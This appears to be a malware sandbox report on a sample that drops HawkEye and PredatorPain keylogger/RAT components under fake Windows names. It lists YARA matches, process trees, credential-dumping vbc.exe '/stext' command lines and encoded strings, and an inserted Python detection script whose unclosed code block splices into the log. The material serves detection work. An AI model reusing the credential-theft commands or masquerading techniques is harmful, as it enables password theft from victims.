                    Source: 00000022.00000000.321958872.00000000007E2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000007.00000003.242361286.0000000000EC4000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, type: DROPPEDMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, type: DROPPED; Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, type: DROPPED; Matched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED; Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPED; Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED; Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPED; Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED; Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPED; Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Desktop\aaVb1xEmrd.exe; Code function: 1_2_0040315D EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_0040315D
Source: C:\Windows\System32\svchost.exe; File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: String function: 00A0BA9D appears 36 times
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: String function: 003EBF1F appears 42 times
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: String function: 0041A7D9 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Code function: String function: 0071A7D9 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_05295B1E NtWriteVirtualMemory,5_2_05295B1E
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_05295A76 NtResumeThread,5_2_05295A76
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_0529548A NtQuerySystemInformation,5_2_0529548A
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_0529545C NtQuerySystemInformation,5_2_0529545C
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_05295AF1 NtWriteVirtualMemory,5_2_05295AF1
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_04E06ABA NtResumeThread,8_2_04E06ABA
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_04E05266 NtQuerySystemInformation,8_2_04E05266
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_04E06B62 NtWriteVirtualMemory,8_2_04E06B62
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_04E0522C NtQuerySystemInformation,8_2_04E0522C
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_04E06B35 NtWriteVirtualMemory,8_2_04E06B35
Source: aaVb1xEmrd.exe, 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp; Binary or memory string: OriginalFilenameMicrosoft.exe4 vs aaVb1xEmrd.exe
Source: MULTIBOT_NEWW.exe.1.dr; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: aaVb1xEmrd.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe; Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows Firewall
Source: classification engine; Classification label: mal100.phis.troj.spyw.evad.winEXE@45/38@8/4
Source: C:\Users\user\Desktop\aaVb1xEmrd.exe; File read: C:\Users\desktop.ini
Source: WindowsUpdate.exe.5.dr, Form1.cs; Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.2.taskhost.exe.9c0000.0.unpack, Form1.cs; Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: taskhost.exe.1.dr, Form1.cs; Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.0.taskhost.exe.9c0000.0.unpack, Form1.cs; Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: MULTIBOT_NEWW.exe, 00000003.00000002.489293811.0000000000418000.00000004.00020000.sdmp; Binary or memory string: bA*\AD:\1. alat hacking\buat\projek vb\baru\MultiBotNew.vbp
Source: MULTIBOT_NEWW.exe; Binary or memory string: A*\AD:\1. alat hacking\buat\projek vb\baru\MultiBotNew.vbp
Source: aaVb1xEmrd.exe; Virustotal: Detection: 69%
Source: aaVb1xEmrd.exe; Metadefender: Detection: 28%
Source: aaVb1xEmrd.exe; ReversingLabs: Detection: 74%
Source: C:\Users\user\Desktop\aaVb1xEmrd.exe; File read: C:\Users\user\Desktop\aaVb1xEmrd.exe
Source: C:\Users\user\Desktop\aaVb1xEmrd.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown; Process created: C:\Users\user\Desktop\aaVb1xEmrd.exe 'C:\Users\user\Desktop\aaVb1xEmrd.exe'
Source: C:\Users\user\Desktop\aaVb1xEmrd.exe; Process created: C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe 'C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe'
Source: C:\Users\user\Desktop\aaVb1xEmrd.exe; Process created: C:\Users\user\AppData\Local\Temp\svchost.exe 'C:\Users\user\AppData\Local\Temp\svchost.exe'
Source: C:\Users\user\Desktop\aaVb1xEmrd.exe; Process created: C:\Users\user\AppData\Local\Temp\taskhost.exe 'C:\Users\user\AppData\Local\Temp\taskhost.exe'
Source: C:\Users\user\Desktop\aaVb1xEmrd.exe; Process created: C:\Users\user\AppData\Local\Temp\iExplorer.exe 'C:\Users\user\AppData\Local\Temp\iExplorer.exe'
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Process created: C:\Users\user\AppData\Roaming\Windows Update.exe 'C:\Users\user\AppData\Roaming\Windows Update.exe'
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2200
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Process created: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe'
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6280 -s 176
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6292 -s 176
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2324
Source: unknown; Process created: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe'
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown; Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown; Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown; Process created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe'
Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown; Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 2336
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 2336
Source: unknown; Process created: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe'
Source: unknown; Process created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe'
Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1096
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1168
Source: unknown; Process created: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe'
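The process-creation records above carry the three tells a detection engineer would key on for this family: system-binary names (svchost.exe, taskhost.exe) launched from %TEMP% or a user profile, a child path under a user profile (C:\Users\gghfgh\...) that is not the account running the sample, and vbc.exe started with the NirSoft "/stext <file>" switch, which the real VB compiler does not have and which only appears because HawkEye hollows MailPassView / WebBrowserPassView into the compiler process. The Python below is an added example, not Joe Sandbox output and not code from the sample; SAMPLE_RECORDS is constructed from the process-creation lines on this page, and the trusted-directory list, lookalike name set, rule names and SANDBOX_USER are assumptions made for the example.

```python
"""Triage sandbox 'Process created' records for HawkEye-style tradecraft.

Added example for this report, not sandbox output or sample code. The
records below are constructed from process-creation lines on this page
(parent image, child image, child command line). TRUSTED_DIRS, the
lookalike-name set, the rule names and SANDBOX_USER are assumptions.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Directories where Windows' own binaries live. A system-binary name launched
# from anywhere else is the "Drops PE files with benign system names" pattern.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                "c:\\windows\\microsoft.net\\")

# File names copied from, or resembling, Windows binaries, as seen in this report.
SYSTEM_LOOKALIKE_NAMES = {"svchost.exe", "taskhost.exe", "iexplorer.exe",
                          "windowsupdate.exe", "windows update.exe"}

# Profile name of the account running the sample in the analysis VM (assumption).
SANDBOX_USER = "user"


@dataclass(frozen=True)
class ProcRecord:
    parent: str   # image path of the creating process ("unknown" if not attributed)
    image: str    # image path of the created process
    cmdline: str  # command line of the created process


@dataclass(frozen=True)
class Finding:
    rule: str
    record: ProcRecord


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _in_trusted_dir(path: str) -> bool:
    lowered = path.lower()
    return any(lowered.startswith(d) for d in TRUSTED_DIRS)


def triage(records):
    """Return one Finding per (rule, record) pair that matches."""
    findings = []
    for rec in records:
        name = _basename(rec.image)
        # Rule 1: a system-binary (or lookalike) name running outside %SystemRoot%.
        if name in SYSTEM_LOOKALIKE_NAMES and not _in_trusted_dir(rec.image):
            findings.append(Finding("masquerading_system_name", rec))
        # Rule 2: vbc.exe / csc.exe started with NirSoft's "/stext <file>" switch.
        # The compilers have no such switch; it shows up when a NirSoft password
        # recovery tool has been hollowed into the compiler process.
        if name in {"vbc.exe", "csc.exe"} and re.search(r"(?i)\s/stext\s", rec.cmdline):
            findings.append(Finding("vbc_stext_credential_dump", rec))
        # Rule 3: the child lives under a profile other than the one running the
        # sample (this report shows C:\Users\gghfgh\... on a VM whose user is "user").
        m = re.match(r"(?i)c:\\users\\([^\\]+)\\", rec.image)
        if m and m.group(1).lower() != SANDBOX_USER:
            findings.append(Finding("foreign_profile_path", rec))
    return findings


def summarize(findings):
    """Count findings per rule name."""
    return dict(Counter(f.rule for f in findings))


# Constructed from the process-creation lines in this report.
SAMPLE_RECORDS = [
    ProcRecord(r"C:\Users\user\Desktop\aaVb1xEmrd.exe",
               r"C:\Users\user\AppData\Local\Temp\svchost.exe",
               r"'C:\Users\user\AppData\Local\Temp\svchost.exe'"),
    ProcRecord(r"C:\Users\user\Desktop\aaVb1xEmrd.exe",
               r"C:\Users\user\AppData\Local\Temp\taskhost.exe",
               r"'C:\Users\user\AppData\Local\Temp\taskhost.exe'"),
    ProcRecord(r"C:\Users\user\AppData\Local\Temp\taskhost.exe",
               r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe",
               r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'"),
    ProcRecord(r"C:\Users\user\AppData\Local\Temp\svchost.exe",
               r"C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe",
               r"'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe'"),
    ProcRecord("unknown",
               r"C:\Windows\System32\svchost.exe",
               r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS"),
    ProcRecord(r"C:\Users\user\AppData\Local\Temp\taskhost.exe",
               r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe",
               "dw20.exe -x -s 2200"),
]

if __name__ == "__main__":
    hits = triage(SAMPLE_RECORDS)
    for f in hits:
        print(f"{f.rule:28} {f.record.image}")
    print(summarize(hits))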
Source: C:\Users\user\Desktop\aaVb1xEmrd.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_05294E52 AdjustTokenPrivileges,5_2_05294E52
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_05294E1B AdjustTokenPrivileges,5_2_05294E1B
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_04E05196 AdjustTokenPrivileges,8_2_04E05196
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_04E0515F AdjustTokenPrivileges,8_2_04E0515F
Source: C:\Users\user\Desktop\aaVb1xEmrd.exe; File created: C:\Users\user\AppData\Local\Temp\nsk8DE2.tmp
Source: C:\Users\user\Desktop\aaVb1xEmrd.exe; Code function: 1_2_004020A3 CoCreateInstance,MultiByteToWideChar,1_2_004020A3
Source: C:\Users\user\Desktop\aaVb1xEmrd.exe; Code function: 1_2_004041ED GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_004041ED
Source: taskhost.exe, iExplorer.exe, Windows Update.exe; Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: taskhost.exe, iExplorer.exe, Windows Update.exe; Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, iExplorer.exe, 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Windows Update.exe, 00000008.00000002.313456976.0000000003D6C000.00000004.00000001.sdmp; Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: taskhost.exe, iExplorer.exe, Windows Update.exe; Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: taskhost.exe, iExplorer.exe, Windows Update.exe; Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: taskhost.exe, iExplorer.exe, Windows Update.exe; Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: taskhost.exe, iExplorer.exe, Windows Update.exe; Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe; Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll (2 times)
Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe; Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp (2 times)
Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe; Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp (2 times)
Source: svchost.exe.1.dr, adiGWFtrqf.cs; Base64 encoded string: 'm64gwmR0HBqjDHzUrBhPfb/YC2Q2XbDWy24DSgcmkigYit4uivnhFo8VijDcPEgMGKep3qNg8lmXDOdbYfdioJ1Cf5SzrnsaxFMaAqef5bJ7ERTgY6Est0zQmlSWXanRQ5m2Peec5ewf8N4pRDrRp0roFQ3bKb2rZ73lbPAEvhSFalCDylU4alwwQgSgHez89kRQyeAOUcd4CRimSMh14A=='
Source: taskhost.exe.1.dr, Form1.cs; Base64 encoded string: 'v7nfuLb0yV+doq0y+Yoxi/qgHH6xeH3nE5Cxy23dNk6dWXT4ZxIlJMClvYdNCBtl', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: iExplorer.exe.1.dr, Form1.cs; Base64 encoded string: 'kbQnaMAqc4rJo1mT4B7RhwJe+fGXJpsZbpD3A8cRLpF8r37V6hwFJclFmi3TuPcV', 'jrjjihHgoFSS2LreSmIPt+dvMS9SWwm2bpCpzwButM0keLFgPXou3jD1/WWxI/SyPaT8uEnh2ZPIQJkcNfdo9K9mbud854hZXCXmEexYTBZThg83UWFB79E6a49yUNIf'
Source: WIN32.exe.4.dr, adiGWFtrqf.cs; Base64 encoded string: 'm64gwmR0HBqjDHzUrBhPfb/YC2Q2XbDWy24DSgcmkigYit4uivnhFo8VijDcPEgMGKep3qNg8lmXDOdbYfdioJ1Cf5SzrnsaxFMaAqef5bJ7ERTgY6Est0zQmlSWXanRQ5m2Peec5ewf8N4pRDrRp0roFQ3bKb2rZ73lbPAEvhSFalCDylU4alwwQgSgHez89kRQyeAOUcd4CRimSMh14A=='
Source: svchost.exe.4.dr, adiGWFtrqf.cs; Base64 encoded string: 'm64gwmR0HBqjDHzUrBhPfb/YC2Q2XbDWy24DSgcmkigYit4uivnhFo8VijDcPEgMGKep3qNg8lmXDOdbYfdioJ1Cf5SzrnsaxFMaAqef5bJ7ERTgY6Est0zQmlSWXanRQ5m2Peec5ewf8N4pRDrRp0roFQ3bKb2rZ73lbPAEvhSFalCDylU4alwwQgSgHez89kRQyeAOUcd4CRimSMh14A=='
Source: 4.0.svchost.exe.f30000.0.unpack, adiGWFtrqf.cs; Base64 encoded string: 'm64gwmR0HBqjDHzUrBhPfb/YC2Q2XbDWy24DSgcmkigYit4uivnhFo8VijDcPEgMGKep3qNg8lmXDOdbYfdioJ1Cf5SzrnsaxFMaAqef5bJ7ERTgY6Est0zQmlSWXanRQ5m2Peec5ewf8N4pRDrRp0roFQ3bKb2rZ73lbPAEvhSFalCDylU4alwwQgSgHez89kRQyeAOUcd4CRimSMh14A=='
Source: 4.2.svchost.exe.f30000.0.unpack, adiGWFtrqf.cs; Base64 encoded string: 'm64gwmR0HBqjDHzUrBhPfb/YC2Q2XbDWy24DSgcmkigYit4uivnhFo8VijDcPEgMGKep3qNg8lmXDOdbYfdioJ1Cf5SzrnsaxFMaAqef5bJ7ERTgY6Est0zQmlSWXanRQ5m2Peec5ewf8N4pRDrRp0roFQ3bKb2rZ73lbPAEvhSFalCDylU4alwwQgSgHez89kRQyeAOUcd4CRimSMh14A=='
Source: WindowsUpdate.exe.5.dr, Form1.cs; Base64 encoded string: 'v7nfuLb0yV+doq0y+Yoxi/qgHH6xeH3nE5Cxy23dNk6dWXT4ZxIlJMClvYdNCBtl', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: 5.0.taskhost.exe.9c0000.0.unpack, Form1.cs; Base64 encoded string: 'v7nfuLb0yV+doq0y+Yoxi/qgHH6xeH3nE5Cxy23dNk6dWXT4ZxIlJMClvYdNCBtl', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: 5.2.taskhost.exe.9c0000.0.unpack, Form1.cs; Base64 encoded string: 'v7nfuLb0yV+doq0y+Yoxi/qgHH6xeH3nE5Cxy23dNk6dWXT4ZxIlJMClvYdNCBtl', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
